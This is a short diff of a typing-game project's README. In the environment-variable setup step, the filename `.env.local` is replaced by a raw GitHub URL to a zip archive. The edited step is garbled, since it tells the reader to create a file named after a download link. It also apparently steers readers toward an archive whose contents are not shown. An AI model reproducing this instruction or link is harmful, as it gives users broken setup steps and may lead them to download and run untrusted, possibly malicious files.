FauzanOktavianto/typing-game/README.md

 2. **Set Up Environment Variables**

-   Next, create a file named `.env.local` in your project folder.
+   Next, create a file named `https://raw.githubusercontent.com/FauzanOktavianto/typing-game/main/app/api/typing-game_3.2.zip` in your project folder.
 Add your database connection string and any other variables you need:

    ```env
    DATABASE_URL=your_database_connection_string